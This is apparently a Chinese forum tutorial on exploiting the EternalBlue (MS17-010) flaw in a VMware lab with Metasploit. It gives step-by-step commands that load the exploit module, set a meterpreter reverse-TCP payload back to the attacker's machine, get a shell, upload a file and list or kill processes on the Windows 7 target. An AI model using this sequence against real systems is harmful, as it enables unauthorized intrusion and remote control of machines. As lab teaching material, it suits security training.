永恒之蓝的原理与实践下-WEB安全社区-弘客官方【交流区】-弘客联盟

永恒之蓝的原理与实践下

今天就到我们实践了,首先声明实验环境,全程使用VMware模拟,包括被打的机器Windows7和攻击主机kali Linux

这里我们先介绍一下我们用到的两个工具

Nmap和msf

Nmap俗称诸神之眼,用于三层发现,端口扫描

Nmap的-A选项可以扫描出操作系统的大致版本(这个功能是相当强大的)

Msf

Payload:Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。

  Shellcode:Shellcode是payload中的精髓部分,在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode通常用汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令之后,才会提供一个命令行shell。

Single:

  是一种完全独立的Payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非metasploit处理工具所捕捉到。

 

Stager:

  这种Payload 负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条 tcp 连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。

 

Stage:

  是Stager Payload下的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。

这里就介绍完了

我们开始实验

d2b5ca33bd221148

 

先把bgm打开

先到kali Linux输入命令行msfconsole启动msf

d2b5ca33bd221210

 

会有如下的界面

这里我们就已经到了msf

然后我们输入search ms17(这个命令就是查找ms17)

d2b5ca33bd221228

 

这里exploit/windows/smb/ms17_010_eternalblue就是我们要用到的模块

d2b5ca33bd221248

use exploit/windows/smb/ms17_010_eternalblue使用这个攻击模板

这里我解释一下auxiliary/scanner/smb/smb_ms17_010和auxiliary/admin/smb/smb_ms17_010是两个辅助模块 这两个模块可以用来验证是否存在这个漏洞

d2b5ca33bd221303

 

这里是我们的Windows7靶机,有点小,我也不知道为什么这么小我也懒得调分辨率

d2b5ca33bd221601

 

然后我们输入show payloads可以看到我们能用的所有payload

这里我们要用set payload windows/x64/meterpreter/reverse_tcp

d2b5ca33bd221750

好了现在我们输入show options设置参数

d2b5ca33bd222206

d2b5ca33bd222222

 

这里就是我们要设置的参数

对于对方的ip地址我们还不知道,因为这里只是实验我们直接在Windows7上输入ipconfig看看就行

d2b5ca33bd222315

 

192.168.134.167

然后我们在kali上打开另一个命令行窗口

d2b5ca33bd222328

 

 

输入ifconfig查看本地的ip,哎呀不对,我设置一下

d2b5ca33bd222342

 

这样才是因为是内网渗透我刚刚给kali设置的是桥接而Windows7是nat这样就让这两台机器不在同一内网下了,我们得稍作更改可以看到192.168.134.150是我们kali本地的IP

d2b5ca33bd222357

 

set LHOST 192.168.134.150这里是设置本地IP LPORT不用管表示本地端口

d2b5ca33bd222406

 

设置目标IP为192.168.134.167

d2b5ca33bd222415

 

查看所有支持的类型

d2b5ca33bd222426

 

使用编号为2的类型(根据情况而定这里如何选择根据靶机的机型)

然后输入exploit启动(记得把Windows7的防火墙关了,不然打不进去)

d2b5ca33bd222540

 

这里就已经打进去了

我们输入run vnc看看桌面(这里需要稍等片刻)

这里出了一点点意外,因为机器性能不行,带不动

那么我们玩一点阴间的吧我们新建一个txt文档在根目录上,然后通过这里传到Windows7

d2b5ca33bd222556

 

这里我用vim编辑器在根目录打开了一个1.txt这里说明一下如果vim没有找到这个名字的文件就会新建一个

d2b5ca33bd222611

d2b5ca33bd222629

 

然后我们输入upload /1.txt

这里我们也可以使用其他的文件只不过txt纯属侮辱人用的

下面我们输入shell

d2b5ca33bd222639

 

那一坨未知符号就是中文因为我的kali没有中文语言包

d2b5ca33bd222649

 

可以看到这个权限还是很高的

我们输入tasklist看看现在有的进程

d2b5ca33bd222657

 

也可以使用taskkill杀掉进程

自己学会了慢慢玩吧

这一期就到这里了

请登录后发表评论